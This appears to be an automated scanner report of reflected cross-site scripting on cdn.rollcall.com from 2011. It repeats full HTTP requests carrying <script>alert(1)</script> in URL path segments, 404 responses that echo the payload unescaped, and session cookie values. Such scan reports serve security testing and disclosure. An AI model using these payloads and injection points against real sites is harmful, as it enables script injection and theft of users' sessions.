GET /css50c4e<script>alert(1)</script>1209bdff379/reset.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:56 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n5), ms iad-agg-n5 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:26 GMT Age: 0 Content-Length: 251 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /css50c4e<script>alert(1)</script>1209bdff379/reset.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec947<script>alert(1)</script>1823adaae09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssec947<script>alert(1)</script>1823adaae09/text.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:57 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n5), ms iad-agg-n5 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:27 GMT Age: 0 Content-Length: 250 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /cssec947<script>alert(1)</script>1823adaae09/text.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bea0d<script>alert(1)</script>20b7081cb50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediabea0d<script>alert(1)</script>20b7081cb50/js/fancybox/jquery.fancybox-1.3.1.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:07 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n19), ms iad-agg-n19 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:38 GMT Age: 0 Content-Length: 281 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediabea0d<script>alert(1)</script>20b7081cb50/js/fancybox/jquery.fancybox-1.3.1.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32500<script>alert(1)</script>a4fbb7611b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js32500<script>alert(1)</script>a4fbb7611b3/fancybox/jquery.fancybox-1.3.1.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:08 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n27), ms iad-agg-n27 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:38 GMT Age: 0 Content-Length: 281 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js32500<script>alert(1)</script>a4fbb7611b3/fancybox/jquery.fancybox-1.3.1.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4b21f<script>alert(1)</script>eed81341fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js/fancybox4b21f<script>alert(1)</script>eed81341fd/jquery.fancybox-1.3.1.css HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:09 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:39 GMT Age: 0 Content-Length: 280 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js/fancybox4b21f<script>alert(1)</script>eed81341fd/jquery.fancybox-1.3.1.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6f8b<script>alert(1)</script>ed288a5d874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediad6f8b<script>alert(1)</script>ed288a5d874/js/fancybox/jquery.fancybox-1.3.1.pack.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:02 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n5), ms iad-agg-n5 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:32 GMT Age: 0 Content-Length: 285 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediad6f8b<script>alert(1)</script>ed288a5d874/js/fancybox/jquery.fancybox-1.3.1.pack.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c76e<script>alert(1)</script>5019abba255 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js8c76e<script>alert(1)</script>5019abba255/fancybox/jquery.fancybox-1.3.1.pack.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:02 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n35), ms iad-agg-n35 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:32 GMT Age: 0 Content-Length: 285 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js8c76e<script>alert(1)</script>5019abba255/fancybox/jquery.fancybox-1.3.1.pack.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d73ce<script>alert(1)</script>943ffe45da8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js/fancyboxd73ce<script>alert(1)</script>943ffe45da8/jquery.fancybox-1.3.1.pack.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:02 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n29), ms iad-agg-n29 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:32 GMT Age: 0 Content-Length: 285 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js/fancyboxd73ce<script>alert(1)</script>943ffe45da8/jquery.fancybox-1.3.1.pack.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73caa<script>alert(1)</script>8588be73cf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media73caa<script>alert(1)</script>8588be73cf8/js/jquery.cookie.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1; __utmz=26361150.1297559579.1.1.utmcsr=drudgereport.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=26361150.455314897.1297559579.1297559579.1297559579.1; __utmc=26361150; __utmb=26361150.1.10.1297559579
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:20 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:51 GMT Age: 0 Content-Length: 263 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media73caa<script>alert(1)</script>8588be73cf8/js/jquery.cookie.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18198<script>alert(1)</script>41b32485a74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js18198<script>alert(1)</script>41b32485a74/jquery.cookie.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1; __utmz=26361150.1297559579.1.1.utmcsr=drudgereport.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=26361150.455314897.1297559579.1297559579.1297559579.1; __utmc=26361150; __utmb=26361150.1.10.1297559579
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:22 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n19), ms iad-agg-n19 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:52 GMT Age: 0 Content-Length: 263 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js18198<script>alert(1)</script>41b32485a74/jquery.cookie.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3044<script>alert(1)</script>e52125a6f33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediaa3044<script>alert(1)</script>e52125a6f33/js/jquery.functions.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:59 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n29), ms iad-agg-n29 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:29 GMT Age: 0 Content-Length: 266 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediaa3044<script>alert(1)</script>e52125a6f33/js/jquery.functions.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb758<script>alert(1)</script>138f6eb7a46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/jseb758<script>alert(1)</script>138f6eb7a46/jquery.functions.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:59 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n31), ms iad-agg-n31 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:29 GMT Age: 0 Content-Length: 266 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/jseb758<script>alert(1)</script>138f6eb7a46/jquery.functions.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aaa0c<script>alert(1)</script>c1980990cae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediaaaa0c<script>alert(1)</script>c1980990cae/js/jquery.hoverIntent.min.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:09 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n35), ms iad-agg-n35 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:39 GMT Age: 0 Content-Length: 272 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediaaaa0c<script>alert(1)</script>c1980990cae/js/jquery.hoverIntent.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b0eb<script>alert(1)</script>cd17b8e170c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js3b0eb<script>alert(1)</script>cd17b8e170c/jquery.hoverIntent.min.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:09 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n13), ms iad-agg-n13 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:39 GMT Age: 0 Content-Length: 272 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js3b0eb<script>alert(1)</script>cd17b8e170c/jquery.hoverIntent.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5672<script>alert(1)</script>f0971fc05a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediad5672<script>alert(1)</script>f0971fc05a7/js/jquery.jtweetsanywhere-1.1.0.min.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:06 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n34), ms iad-agg-n34 ( origin>CONN) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:36 GMT Age: 0 Content-Length: 282 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediad5672<script>alert(1)</script>f0971fc05a7/js/jquery.jtweetsanywhere-1.1.0.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8da94<script>alert(1)</script>7219a2606ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js8da94<script>alert(1)</script>7219a2606ef/jquery.jtweetsanywhere-1.1.0.min.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:07 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n33), ms iad-agg-n33 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:37 GMT Age: 0 Content-Length: 282 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js8da94<script>alert(1)</script>7219a2606ef/jquery.jtweetsanywhere-1.1.0.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94a3e<script>alert(1)</script>ff051696785 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media94a3e<script>alert(1)</script>ff051696785/js/jquery.min.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:00 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n12), ms iad-agg-n12 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:30 GMT Age: 0 Content-Length: 260 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media94a3e<script>alert(1)</script>ff051696785/js/jquery.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb164<script>alert(1)</script>8f71f8a479d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
